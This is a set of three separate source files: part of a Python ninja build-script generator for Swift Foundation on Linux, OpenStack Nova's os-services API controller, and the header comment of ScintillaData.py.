# foundation.CFLAGS += " "+" ".join([
# '-DDEPLOYMENT_ENABLE_LIBDISPATCH',
# '-I'+Configuration.current.variables["LIBDISPATCH_SOURCE_DIR"],
# '-I'+Configuration.current.variables["LIBDISPATCH_BUILD_DIR"]+'/tests' # for include of dispatch/private.h in CF
# ])
# swift_cflags += ([
# '-DDEPLOYMENT_ENABLE_LIBDISPATCH',
# '-I'+Configuration.current.variables["LIBDISPATCH_SOURCE_DIR"],
# '-I'+Configuration.current.variables["LIBDISPATCH_BUILD_DIR"]+'/src'
# ])
# foundation.LDFLAGS += '-ldispatch -L'+Configuration.current.variables["LIBDISPATCH_BUILD_DIR"]+'/src/.libs '
foundation.SWIFTCFLAGS = " ".join(swift_cflags)
foundation.LDFLAGS += '-lpthread -ldl -lm -lswiftCore -lxml2 '
if "XCTEST_BUILD_DIR" in Configuration.current.variables:
foundation.LDFLAGS += '-L${XCTEST_BUILD_DIR}'
headers = CopyHeaders(
module = 'CoreFoundation/Base.subproj/linux.modulemap',
public = [
'CoreFoundation/Stream.subproj/CFStream.h',
'CoreFoundation/String.subproj/CFStringEncodingExt.h',
'CoreFoundation/Base.subproj/SwiftRuntime/CoreFoundation.h',
'CoreFoundation/Base.subproj/SwiftRuntime/TargetConditionals.h',
'CoreFoundation/RunLoop.subproj/CFMessagePort.h',
'CoreFoundation/Collections.subproj/CFBinaryHeap.h',
'CoreFoundation/PlugIn.subproj/CFBundle.h',
'CoreFoundation/Locale.subproj/CFCalendar.h',
'CoreFoundation/Collections.subproj/CFBitVector.h',
'CoreFoundation/Base.subproj/CFAvailability.h',
'CoreFoundation/Collections.subproj/CFTree.h',
'CoreFoundation/NumberDate.subproj/CFTimeZone.h',
'CoreFoundation/Error.subproj/CFError.h',
'CoreFoundation/Collections.subproj/CFBag.h',
'CoreFoundation/PlugIn.subproj/CFPlugIn.h',
'CoreFoundation/Parsing.subproj/CFXMLParser.h',
'CoreFoundation/String.subproj/CFString.h',
'CoreFoundation/Collections.subproj/CFSet.h',
'CoreFoundation/Base.subproj/CFUUID.h',
'CoreFoundation/NumberDate.subproj/CFDate.h',
'CoreFoundation/Collections.subproj/CFDictionary.h',
'CoreFoundation/Base.subproj/CFByteOrder.h',
'CoreFoundation/AppServices.subproj/CFUserNotification.h',
'CoreFoundation/Base.subproj/CFBase.h',
'CoreFoundation/Preferences.subproj/CFPreferences.h',
'CoreFoundation/Locale.subproj/CFLocale.h',
'CoreFoundation/RunLoop.subproj/CFSocket.h',
'CoreFoundation/Parsing.subproj/CFPropertyList.h',
'CoreFoundation/Collections.subproj/CFArray.h',
'CoreFoundation/RunLoop.subproj/CFRunLoop.h',
'CoreFoundation/URL.subproj/CFURLAccess.h',
'CoreFoundation/Locale.subproj/CFDateFormatter.h',
'CoreFoundation/RunLoop.subproj/CFMachPort.h',
'CoreFoundation/PlugIn.subproj/CFPlugInCOM.h',
'CoreFoundation/Base.subproj/CFUtilities.h',
'CoreFoundation/Parsing.subproj/CFXMLNode.h',
'CoreFoundation/URL.subproj/CFURLComponents.h',
'CoreFoundation/URL.subproj/CFURL.h',
'CoreFoundation/Locale.subproj/CFNumberFormatter.h',
'CoreFoundation/String.subproj/CFCharacterSet.h',
'CoreFoundation/NumberDate.subproj/CFNumber.h',
'CoreFoundation/Collections.subproj/CFData.h',
'CoreFoundation/String.subproj/CFAttributedString.h',
],
private = [
'CoreFoundation/Base.subproj/ForSwiftFoundationOnly.h',
'CoreFoundation/Base.subproj/ForFoundationOnly.h',
'CoreFoundation/String.subproj/CFBurstTrie.h',
'CoreFoundation/Error.subproj/CFError_Private.h',
'CoreFoundation/URL.subproj/CFURLPriv.h',
'CoreFoundation/Base.subproj/CFLogUtilities.h',
'CoreFoundation/PlugIn.subproj/CFBundlePriv.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverter.h',
'CoreFoundation/Stream.subproj/CFStreamAbstract.h',
'CoreFoundation/Base.subproj/CFInternal.h',
'CoreFoundation/Parsing.subproj/CFXMLInputStream.h',
'CoreFoundation/Parsing.subproj/CFXMLInterface.h',
'CoreFoundation/PlugIn.subproj/CFPlugIn_Factory.h',
'CoreFoundation/String.subproj/CFStringLocalizedFormattingInternal.h',
'CoreFoundation/PlugIn.subproj/CFBundle_Internal.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverterPriv.h',
'CoreFoundation/Collections.subproj/CFBasicHash.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingDatabase.h',
'CoreFoundation/StringEncodings.subproj/CFUnicodeDecomposition.h',
'CoreFoundation/Stream.subproj/CFStreamInternal.h',
'CoreFoundation/PlugIn.subproj/CFBundle_BinaryTypes.h',
'CoreFoundation/Locale.subproj/CFICULogging.h',
'CoreFoundation/Locale.subproj/CFLocaleInternal.h',
'CoreFoundation/StringEncodings.subproj/CFUnicodePrecomposition.h',
'CoreFoundation/Base.subproj/CFPriv.h',
'CoreFoundation/StringEncodings.subproj/CFUniCharPriv.h',
'CoreFoundation/URL.subproj/CFURL.inc.h',
'CoreFoundation/NumberDate.subproj/CFBigNumber.h',
'CoreFoundation/StringEncodings.subproj/CFUniChar.h',
'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverterExt.h',
'CoreFoundation/Collections.subproj/CFStorage.h',
'CoreFoundation/Base.subproj/CFRuntime.h',
'CoreFoundation/String.subproj/CFStringDefaultEncoding.h',
'CoreFoundation/String.subproj/CFCharacterSetPriv.h',
'CoreFoundation/Stream.subproj/CFStreamPriv.h',
'CoreFoundation/StringEncodings.subproj/CFICUConverters.h',
'CoreFoundation/String.subproj/CFRegularExpression.h',
'CoreFoundation/String.subproj/CFRunArray.h',
],
project = [
])
foundation.add_phase(headers)

# C sources for CoreFoundation plus the bundled closure/uuid support code.
# Entries that are commented out are Darwin-only and are not built for
# this (Linux/Swift) target.
sources = CompileSources([
    'closure/data.c',
    'closure/runtime.c',
    'uuid/uuid.c',
    # 'CoreFoundation/AppServices.subproj/CFUserNotification.c',
    'CoreFoundation/Base.subproj/CFBase.c',
    'CoreFoundation/Base.subproj/CFFileUtilities.c',
    'CoreFoundation/Base.subproj/CFPlatform.c',
    'CoreFoundation/Base.subproj/CFRuntime.c',
    'CoreFoundation/Base.subproj/CFSortFunctions.c',
    'CoreFoundation/Base.subproj/CFSystemDirectories.c',
    'CoreFoundation/Base.subproj/CFUtilities.c',
    'CoreFoundation/Base.subproj/CFUUID.c',
    'CoreFoundation/Collections.subproj/CFArray.c',
    'CoreFoundation/Collections.subproj/CFBag.c',
    'CoreFoundation/Collections.subproj/CFBasicHash.c',
    'CoreFoundation/Collections.subproj/CFBinaryHeap.c',
    'CoreFoundation/Collections.subproj/CFBitVector.c',
    'CoreFoundation/Collections.subproj/CFData.c',
    'CoreFoundation/Collections.subproj/CFDictionary.c',
    'CoreFoundation/Collections.subproj/CFSet.c',
    'CoreFoundation/Collections.subproj/CFStorage.c',
    'CoreFoundation/Collections.subproj/CFTree.c',
    'CoreFoundation/Error.subproj/CFError.c',
    'CoreFoundation/Locale.subproj/CFCalendar.c',
    'CoreFoundation/Locale.subproj/CFDateFormatter.c',
    'CoreFoundation/Locale.subproj/CFLocale.c',
    'CoreFoundation/Locale.subproj/CFLocaleIdentifier.c',
    'CoreFoundation/Locale.subproj/CFLocaleKeys.c',
    'CoreFoundation/Locale.subproj/CFNumberFormatter.c',
    'CoreFoundation/NumberDate.subproj/CFBigNumber.c',
    'CoreFoundation/NumberDate.subproj/CFDate.c',
    'CoreFoundation/NumberDate.subproj/CFNumber.c',
    'CoreFoundation/NumberDate.subproj/CFTimeZone.c',
    'CoreFoundation/Parsing.subproj/CFBinaryPList.c',
    'CoreFoundation/Parsing.subproj/CFOldStylePList.c',
    'CoreFoundation/Parsing.subproj/CFPropertyList.c',
    'CoreFoundation/Parsing.subproj/CFXMLInputStream.c',
    'CoreFoundation/Parsing.subproj/CFXMLNode.c',
    'CoreFoundation/Parsing.subproj/CFXMLParser.c',
    'CoreFoundation/Parsing.subproj/CFXMLTree.c',
    'CoreFoundation/Parsing.subproj/CFXMLInterface.c',
    'CoreFoundation/PlugIn.subproj/CFBundle.c',
    'CoreFoundation/PlugIn.subproj/CFBundle_Binary.c',
    'CoreFoundation/PlugIn.subproj/CFBundle_Grok.c',
    'CoreFoundation/PlugIn.subproj/CFBundle_InfoPlist.c',
    'CoreFoundation/PlugIn.subproj/CFBundle_Locale.c',
    'CoreFoundation/PlugIn.subproj/CFBundle_Resources.c',
    'CoreFoundation/PlugIn.subproj/CFBundle_Strings.c',
    'CoreFoundation/PlugIn.subproj/CFPlugIn.c',
    'CoreFoundation/PlugIn.subproj/CFPlugIn_Factory.c',
    'CoreFoundation/PlugIn.subproj/CFPlugIn_Instance.c',
    'CoreFoundation/PlugIn.subproj/CFPlugIn_PlugIn.c',
    'CoreFoundation/Preferences.subproj/CFApplicationPreferences.c',
    'CoreFoundation/Preferences.subproj/CFPreferences.c',
    # 'CoreFoundation/RunLoop.subproj/CFMachPort.c',
    # 'CoreFoundation/RunLoop.subproj/CFMessagePort.c',
    'CoreFoundation/RunLoop.subproj/CFRunLoop.c',
    'CoreFoundation/RunLoop.subproj/CFSocket.c',
    'CoreFoundation/Stream.subproj/CFConcreteStreams.c',
    'CoreFoundation/Stream.subproj/CFSocketStream.c',
    'CoreFoundation/Stream.subproj/CFStream.c',
    'CoreFoundation/String.subproj/CFBurstTrie.c',
    'CoreFoundation/String.subproj/CFCharacterSet.c',
    'CoreFoundation/String.subproj/CFString.c',
    'CoreFoundation/String.subproj/CFStringEncodings.c',
    'CoreFoundation/String.subproj/CFStringScanner.c',
    'CoreFoundation/String.subproj/CFStringUtilities.c',
    'CoreFoundation/String.subproj/CFStringTransform.c',
    'CoreFoundation/StringEncodings.subproj/CFBuiltinConverters.c',
    'CoreFoundation/StringEncodings.subproj/CFICUConverters.c',
    'CoreFoundation/StringEncodings.subproj/CFPlatformConverters.c',
    'CoreFoundation/StringEncodings.subproj/CFStringEncodingConverter.c',
    'CoreFoundation/StringEncodings.subproj/CFStringEncodingDatabase.c',
    'CoreFoundation/StringEncodings.subproj/CFUniChar.c',
    'CoreFoundation/StringEncodings.subproj/CFUnicodeDecomposition.c',
    'CoreFoundation/StringEncodings.subproj/CFUnicodePrecomposition.c',
    'CoreFoundation/URL.subproj/CFURL.c',
    'CoreFoundation/URL.subproj/CFURLAccess.c',
    'CoreFoundation/URL.subproj/CFURLComponents.c',
    'CoreFoundation/URL.subproj/CFURLComponents_URIParser.c',
    # Pre-generated Unicode data tables shipped as assembly blobs.
    'CoreFoundation/String.subproj/CFCharacterSetData.S',
    'CoreFoundation/String.subproj/CFUnicodeDataL.S',
    'CoreFoundation/String.subproj/CFUniCharPropertyDatabase.S',
    'CoreFoundation/String.subproj/CFRegularExpression.c',
    'CoreFoundation/String.subproj/CFAttributedString.c',
    'CoreFoundation/String.subproj/CFRunArray.c',
])
# Headers must be copied into place before the C sources compile.
sources.add_dependency(headers)
foundation.add_phase(sources)
# The Swift overlay: every Foundation class implemented in Swift.
swift_sources = CompileSwiftSources([
    'Foundation/NSObject.swift',
    'Foundation/NSAffineTransform.swift',
    'Foundation/NSArray.swift',
    'Foundation/NSAttributedString.swift',
    'Foundation/NSBundle.swift',
    'Foundation/NSByteCountFormatter.swift',
    'Foundation/NSCache.swift',
    'Foundation/NSCalendar.swift',
    'Foundation/NSCFArray.swift',
    'Foundation/NSCFDictionary.swift',
    'Foundation/NSCFSet.swift',
    'Foundation/NSCFString.swift',
    'Foundation/NSCharacterSet.swift',
    'Foundation/NSCoder.swift',
    'Foundation/NSComparisonPredicate.swift',
    'Foundation/NSCompoundPredicate.swift',
    'Foundation/NSConcreteValue.swift',
    'Foundation/NSData.swift',
    'Foundation/NSDate.swift',
    'Foundation/NSDateComponentsFormatter.swift',
    'Foundation/NSDateFormatter.swift',
    'Foundation/NSDateIntervalFormatter.swift',
    'Foundation/NSDecimal.swift',
    'Foundation/NSDecimalNumber.swift',
    'Foundation/NSDictionary.swift',
    'Foundation/NSEnergyFormatter.swift',
    'Foundation/NSEnumerator.swift',
    'Foundation/NSError.swift',
    'Foundation/NSExpression.swift',
    'Foundation/NSFileHandle.swift',
    'Foundation/NSFileManager.swift',
    'Foundation/NSFormatter.swift',
    'Foundation/NSGeometry.swift',
    'Foundation/NSHost.swift',
    'Foundation/NSHTTPCookie.swift',
    'Foundation/NSHTTPCookieStorage.swift',
    'Foundation/NSIndexPath.swift',
    'Foundation/NSIndexSet.swift',
    'Foundation/NSJSONSerialization.swift',
    'Foundation/NSKeyedCoderOldStyleArray.swift',
    'Foundation/NSKeyedArchiver.swift',
    'Foundation/NSKeyedUnarchiver.swift',
    'Foundation/NSLengthFormatter.swift',
    'Foundation/NSLocale.swift',
    'Foundation/NSLock.swift',
    'Foundation/NSLog.swift',
    'Foundation/NSMassFormatter.swift',
    'Foundation/NSNotification.swift',
    'Foundation/NSNotificationQueue.swift',
    'Foundation/NSNull.swift',
    'Foundation/NSNumber.swift',
    'Foundation/NSNumberFormatter.swift',
    'Foundation/NSObjCRuntime.swift',
    'Foundation/NSOperation.swift',
    'Foundation/NSOrderedSet.swift',
    'Foundation/NSPathUtilities.swift',
    'Foundation/NSPersonNameComponents.swift',
    'Foundation/NSPersonNameComponentsFormatter.swift',
    'Foundation/NSPort.swift',
    'Foundation/NSPortMessage.swift',
    'Foundation/NSPredicate.swift',
    'Foundation/NSProcessInfo.swift',
    'Foundation/NSProgress.swift',
    'Foundation/NSPropertyList.swift',
    'Foundation/NSRange.swift',
    'Foundation/NSRegularExpression.swift',
    'Foundation/NSRunLoop.swift',
    'Foundation/NSScanner.swift',
    'Foundation/NSSet.swift',
    'Foundation/NSSortDescriptor.swift',
    'Foundation/NSSpecialValue.swift',
    'Foundation/NSStream.swift',
    'Foundation/NSString.swift',
    'Foundation/String.swift',
    'Foundation/NSSwiftRuntime.swift',
    'Foundation/NSTask.swift',
    'Foundation/NSTextCheckingResult.swift',
    'Foundation/NSThread.swift',
    'Foundation/NSTimer.swift',
    'Foundation/NSTimeZone.swift',
    'Foundation/NSURL.swift',
    'Foundation/NSURLAuthenticationChallenge.swift',
    'Foundation/NSURLCache.swift',
    'Foundation/NSURLCredential.swift',
    'Foundation/NSURLCredentialStorage.swift',
    'Foundation/NSURLError.swift',
    'Foundation/NSURLProtectionSpace.swift',
    'Foundation/NSURLProtocol.swift',
    'Foundation/NSURLRequest.swift',
    'Foundation/NSURLResponse.swift',
    'Foundation/NSURLSession.swift',
    'Foundation/NSUserDefaults.swift',
    'Foundation/NSUUID.swift',
    'Foundation/NSValue.swift',
    'Foundation/NSXMLDocument.swift',
    'Foundation/NSXMLDTD.swift',
    'Foundation/NSXMLDTDNode.swift',
    'Foundation/NSXMLElement.swift',
    'Foundation/NSXMLNode.swift',
    'Foundation/NSXMLNodeOptions.swift',
    'Foundation/NSXMLParser.swift',
    'Foundation/FoundationErrors.swift',
])
# The Swift compile imports the (copied) CoreFoundation headers.
swift_sources.add_dependency(headers)
foundation.add_phase(swift_sources)
# Fixture files copied alongside the TestFoundation executable.
foundation_tests_resources = CopyResources('TestFoundation', [
    'TestFoundation/Resources/Info.plist',
    'TestFoundation/Resources/NSURLTestData.plist',
    'TestFoundation/Resources/Test.plist',
    'TestFoundation/Resources/NSStringTestData.txt',
    'TestFoundation/Resources/NSXMLDocumentTestData.xml',
    'TestFoundation/Resources/PropertyList-1.0.dtd',
    'TestFoundation/Resources/NSXMLDTDTestData.xml',
    'TestFoundation/Resources/NSKeyedUnarchiver-ArrayTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-ComplexTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-ConcreteValueTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-EdgeInsetsTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-NotificationTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-RangeTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-RectTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-URLTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-UUIDTest.plist',
    'TestFoundation/Resources/NSKeyedUnarchiver-OrderedSetTest.plist',
])
# TODO: Probably this should be another 'product', but for now it's simply a phase
foundation_tests = SwiftExecutable('TestFoundation', [
    'TestFoundation/main.swift',
] + glob.glob('./TestFoundation/Test*.swift')) # all TestSomething.swift are considered sources to the test project in the TestFoundation directory
foundation_tests.add_dependency(foundation_tests_resources)
foundation.add_phase(foundation_tests_resources)
foundation.add_phase(foundation_tests)
# Stand-alone plutil command-line tool built from the same tree.
plutil = SwiftExecutable('plutil', ['Tools/plutil/main.swift'])
foundation.add_phase(plutil)
script.add_product(foundation)
# Raw ninja text appended verbatim to the generated build script: the
# `install` target copies the built library, Swift module docs and
# CoreFoundation headers into DSTROOT.
extra_script = """
rule InstallFoundation
    command = mkdir -p "${DSTROOT}/${PREFIX}/lib/swift/${OS}"; $
        cp "${BUILD_DIR}/Foundation/${DYLIB_PREFIX}Foundation${DYLIB_SUFFIX}" "${DSTROOT}/${PREFIX}/lib/swift/${OS}"; $
        mkdir -p "${DSTROOT}/${PREFIX}/lib/swift/${OS}/${ARCH}"; $
        cp "${BUILD_DIR}/Foundation/Foundation.swiftmodule" "${DSTROOT}/${PREFIX}/lib/swift/${OS}/${ARCH}/"; $
        cp "${BUILD_DIR}/Foundation/Foundation.swiftdoc" "${DSTROOT}/${PREFIX}/lib/swift/${OS}/${ARCH}/"; $
        mkdir -p "${DSTROOT}/${PREFIX}/local/include"; $
        rsync -r "${BUILD_DIR}/Foundation/${PREFIX}/lib/swift/CoreFoundation" "${DSTROOT}/${PREFIX}/lib/swift/"
build ${BUILD_DIR}/.install: InstallFoundation ${BUILD_DIR}/Foundation/${DYLIB_PREFIX}Foundation${DYLIB_SUFFIX}
build install: phony | ${BUILD_DIR}/.install
"""
# The `test` target only prints the command lines to run/debug the test
# binary; the two branches differ solely in whether XCTest's build dir
# must be appended to LD_LIBRARY_PATH.
if "XCTEST_BUILD_DIR" in Configuration.current.variables:
    extra_script += """
rule RunTestFoundation
    command = echo "**** RUNNING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/:${XCTEST_BUILD_DIR} ${BUILD_DIR}/TestFoundation/TestFoundation\\n**** DEBUGGING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/:${XCTEST_BUILD_DIR} lldb ${BUILD_DIR}/TestFoundation/TestFoundation\\n"
    description = Building Tests
build ${BUILD_DIR}/.test: RunTestFoundation | TestFoundation
build test: phony | ${BUILD_DIR}/.test
"""
else:
    extra_script += """
rule RunTestFoundation
    command = echo "**** RUNNING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/ ${BUILD_DIR}/TestFoundation/TestFoundation\\n**** DEBUGGING TESTS ****\\nexecute:\\nLD_LIBRARY_PATH=${BUILD_DIR}/Foundation/ lldb ${BUILD_DIR}/TestFoundation/TestFoundation\\n"
    description = Building Tests
build ${BUILD_DIR}/.test: RunTestFoundation | TestFoundation
build test: phony | ${BUILD_DIR}/.test
"""
script.add_text(extra_script)
script.generate()
| |
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import strutils
from oslo_utils import uuidutils
import webob.exc
from nova.api.openstack import api_version_request
from nova.api.openstack.compute.schemas import services
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova import availability_zones
from nova import compute
from nova import exception
from nova.i18n import _
from nova.policies import services as services_policies
from nova import servicegroup
from nova import utils
# Starting with this API microversion, services are identified by UUID
# rather than by integer id in the os-services requests/responses.
UUID_FOR_ID_MIN_VERSION = '2.53'
class ServiceController(wsgi.Controller):
    """Controller for the os-services API.

    Lists, enables/disables, force-downs, updates and deletes nova
    services.  Behavior is microversioned: before 2.53 PUT carries the
    action name in the URL path; from 2.53 services are addressed by
    UUID and updated via the request body.
    """

    def __init__(self):
        self.host_api = compute.HostAPI()
        self.aggregate_api = compute.api.AggregateAPI()
        self.servicegroup_api = servicegroup.API()
        # Pre-2.53 PUT dispatch table: the "action" comes from the URL
        # path, e.g. PUT /os-services/disable.
        self.actions = {"enable": self._enable,
                        "disable": self._disable,
                        "disable-log-reason": self._disable_log_reason}

    def _get_services(self, req):
        """Return all RPC services, optionally filtered by the ?host=
        and/or ?binary= query parameters.
        """
        # The API services are filtered out since they are not RPC services
        # and therefore their state is not reported through the service group
        # API, so they would always be reported as 'down' (see bug 1543625).
        api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
        context = req.environ['nova.context']
        context.can(services_policies.BASE_POLICY_NAME)
        _services = [
            s
            for s in self.host_api.service_get_all(context, set_zones=True,
                                                   all_cells=True)
            if s['binary'] not in api_services
        ]
        host = ''
        if 'host' in req.GET:
            host = req.GET['host']
        binary = ''
        if 'binary' in req.GET:
            binary = req.GET['binary']
        if host:
            _services = [s for s in _services if s['host'] == host]
        if binary:
            _services = [s for s in _services if s['binary'] == binary]
        return _services

    def _get_service_detail(self, svc, additional_fields, req):
        """Build the API representation (a dict) of one service record,
        plus any requested *additional_fields* (e.g. 'forced_down').
        """
        alive = self.servicegroup_api.service_is_up(svc)
        state = (alive and "up") or "down"
        active = 'enabled'
        if svc['disabled']:
            active = 'disabled'
        updated_time = self.servicegroup_api.get_updated_time(svc)
        # From 2.53 on, the 'id' field carries the service uuid.
        uuid_for_id = api_version_request.is_supported(
            req, min_version=UUID_FOR_ID_MIN_VERSION)
        if 'availability_zone' not in svc:
            # The service wasn't loaded with the AZ so we need to do it here.
            # Yes this looks weird, but set_availability_zones makes a copy of
            # the list passed in and mutates the objects within it, so we have
            # to pull it back out from the resulting copied list.
            svc.availability_zone = (
                availability_zones.set_availability_zones(
                    req.environ['nova.context'],
                    [svc])[0]['availability_zone'])
        service_detail = {'binary': svc['binary'],
                          'host': svc['host'],
                          'id': svc['uuid' if uuid_for_id else 'id'],
                          'zone': svc['availability_zone'],
                          'status': active,
                          'state': state,
                          'updated_at': updated_time,
                          'disabled_reason': svc['disabled_reason']}
        for field in additional_fields:
            service_detail[field] = svc[field]
        return service_detail

    def _get_services_list(self, req, additional_fields=()):
        """Return detail dicts for all (filtered) services."""
        _services = self._get_services(req)
        return [self._get_service_detail(svc, additional_fields, req)
                for svc in _services]

    def _enable(self, body, context):
        """Enable scheduling for a service."""
        return self._enable_disable(body, context, "enabled",
                                    {'disabled': False,
                                     'disabled_reason': None})

    def _disable(self, body, context, reason=None):
        """Disable scheduling for a service with optional log."""
        return self._enable_disable(body, context, "disabled",
                                    {'disabled': True,
                                     'disabled_reason': reason})

    def _disable_log_reason(self, body, context):
        """Disable scheduling for a service with a log."""
        try:
            reason = body['disabled_reason']
        except KeyError:
            msg = _('Missing disabled reason field')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return self._disable(body, context, reason)

    def _enable_disable(self, body, context, status, params_to_update):
        """Enable/Disable scheduling for a service."""
        reason = params_to_update.get('disabled_reason')
        ret_value = {
            'service': {
                'host': body['host'],
                'binary': body['binary'],
                'status': status
            },
        }
        if reason:
            ret_value['service']['disabled_reason'] = reason
        self._update(context, body['host'], body['binary'], params_to_update)
        return ret_value

    def _forced_down(self, body, context):
        """Set or unset forced_down flag for the service"""
        try:
            forced_down = strutils.bool_from_string(body["forced_down"])
        except KeyError:
            msg = _('Missing forced_down field')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        host = body['host']
        binary = body['binary']
        ret_value = {'service': {'host': host,
                                 'binary': binary,
                                 'forced_down': forced_down}}
        self._update(context, host, binary, {"forced_down": forced_down})
        return ret_value

    def _update(self, context, host, binary, payload):
        """Do the actual PUT/update"""
        try:
            self.host_api.service_update(context, host, binary, payload)
        except (exception.HostBinaryNotFound,
                exception.HostMappingNotFound) as exc:
            raise webob.exc.HTTPNotFound(explanation=exc.format_message())

    def _perform_action(self, req, id, body, actions):
        """Calculate action dictionary dependent on provided fields"""
        context = req.environ['nova.context']
        context.can(services_policies.BASE_POLICY_NAME)
        try:
            action = actions[id]
        except KeyError:
            msg = _("Unknown action")
            raise webob.exc.HTTPNotFound(explanation=msg)
        return action(body, context)

    @wsgi.response(204)
    @extensions.expected_errors((400, 404))
    def delete(self, req, id):
        """Deletes the specified service.

        *id* is a UUID from 2.53 on, an integer id before that; it is
        validated accordingly before the lookup.
        """
        context = req.environ['nova.context']
        context.can(services_policies.BASE_POLICY_NAME)
        if api_version_request.is_supported(
                req, min_version=UUID_FOR_ID_MIN_VERSION):
            if not uuidutils.is_uuid_like(id):
                msg = _('Invalid uuid %s') % id
                raise webob.exc.HTTPBadRequest(explanation=msg)
        else:
            try:
                utils.validate_integer(id, 'id')
            except exception.InvalidInput as exc:
                raise webob.exc.HTTPBadRequest(
                    explanation=exc.format_message())
        try:
            service = self.host_api.service_get_by_id(context, id)
            # remove the service from all the aggregates in which it's included
            if service.binary == 'nova-compute':
                aggrs = self.aggregate_api.get_aggregates_by_host(context,
                                                                  service.host)
                for ag in aggrs:
                    self.aggregate_api.remove_host_from_aggregate(context,
                                                                  ag.id,
                                                                  service.host)
            self.host_api.service_delete(context, id)
        except exception.ServiceNotFound:
            explanation = _("Service %s not found.") % id
            raise webob.exc.HTTPNotFound(explanation=explanation)
        except exception.ServiceNotUnique:
            explanation = _("Service id %s refers to multiple services.") % id
            raise webob.exc.HTTPBadRequest(explanation=explanation)

    @extensions.expected_errors(())
    def index(self, req):
        """Return a list of all running services. Filter by host & service
        name
        """
        # 2.11+ additionally reports the forced_down flag per service.
        if api_version_request.is_supported(req, min_version='2.11'):
            _services = self._get_services_list(req, ['forced_down'])
        else:
            _services = self._get_services_list(req)
        return {'services': _services}

    @wsgi.Controller.api_version('2.1', '2.52')
    @extensions.expected_errors((400, 404))
    @validation.schema(services.service_update, '2.0', '2.10')
    @validation.schema(services.service_update_v211, '2.11', '2.52')
    def update(self, req, id, body):
        """Perform service update

        Before microversion 2.53, the body contains a host and binary value
        to identify the service on which to perform the action. There is no
        service ID passed on the path, just the action, for example
        PUT /os-services/disable.
        """
        # 2.11+ additionally supports the force-down action.
        if api_version_request.is_supported(req, min_version='2.11'):
            actions = self.actions.copy()
            actions["force-down"] = self._forced_down
        else:
            actions = self.actions
        return self._perform_action(req, id, body, actions)

    @wsgi.Controller.api_version(UUID_FOR_ID_MIN_VERSION)  # noqa F811
    @extensions.expected_errors((400, 404))
    @validation.schema(services.service_update_v2_53, UUID_FOR_ID_MIN_VERSION)
    def update(self, req, id, body):
        """Perform service update

        Starting with microversion 2.53, the service uuid is passed in on the
        path of the request to uniquely identify the service record on which to
        perform a given update, which is defined in the body of the request.
        """
        service_id = id
        # Validate that the service ID is a UUID.
        if not uuidutils.is_uuid_like(service_id):
            msg = _('Invalid uuid %s') % service_id
            raise webob.exc.HTTPBadRequest(explanation=msg)

        # Validate the request context against the policy.
        context = req.environ['nova.context']
        context.can(services_policies.BASE_POLICY_NAME)

        # Get the service by uuid.
        try:
            service = self.host_api.service_get_by_id(context, service_id)
            # At this point the context is targeted to the cell that the
            # service was found in so we don't need to do any explicit cell
            # targeting below.
        except exception.ServiceNotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())

        # Return 400 if service.binary is not nova-compute.
        # Before the earlier PUT handlers were made cells-aware, you could
        # technically disable a nova-scheduler service, although that doesn't
        # really do anything within Nova and is just confusing. Now trying to
        # do that will fail as a nova-scheduler service won't have a host
        # mapping so you'll get a 404. In this new microversion, we close that
        # old gap and make sure you can only enable/disable and set forced_down
        # on nova-compute services since those are the only ones that make
        # sense to update for those operations.
        if service.binary != 'nova-compute':
            msg = (_('Updating a %(binary)s service is not supported. Only '
                     'nova-compute services can be updated.') %
                   {'binary': service.binary})
            raise webob.exc.HTTPBadRequest(explanation=msg)

        # Now determine the update to perform based on the body. We are
        # intentionally not using _perform_action or the other old-style
        # action functions.
        if 'status' in body:
            # This is a status update for either enabled or disabled.
            if body['status'] == 'enabled':
                # Fail if 'disabled_reason' was requested when enabling the
                # service since those two combined don't make sense.
                if body.get('disabled_reason'):
                    msg = _("Specifying 'disabled_reason' with status "
                            "'enabled' is invalid.")
                    raise webob.exc.HTTPBadRequest(explanation=msg)
                service.disabled = False
                service.disabled_reason = None
            elif body['status'] == 'disabled':
                service.disabled = True
                # The disabled reason is optional.
                service.disabled_reason = body.get('disabled_reason')

        # This is intentionally not an elif, i.e. it's in addition to the
        # status update.
        if 'forced_down' in body:
            service.forced_down = strutils.bool_from_string(
                body['forced_down'], strict=True)

        # Check to see if anything was actually updated since the schema does
        # not define any required fields.
        if not service.obj_what_changed():
            msg = _("No updates were requested. Fields 'status' or "
                    "'forced_down' should be specified.")
            raise webob.exc.HTTPBadRequest(explanation=msg)

        # Now save our updates to the service record in the database.
        service.save()

        # Return the full service record details.
        additional_fields = ['forced_down']
        return {'service': self._get_service_detail(
            service, additional_fields, req)}
| |
# ScintillaData.py - implemented 2013 by Neil Hodgson neilh@scintilla.org
# Released to the public domain.
# Common code used by Scintilla and SciTE for source file regeneration.
# The ScintillaData object exposes information about Scintilla as properties:
# Version properties
# version
# versionDotted
# versionCommad
#
# Date last modified
# dateModified
# yearModified
# mdyModified
# dmyModified
# myModified
#
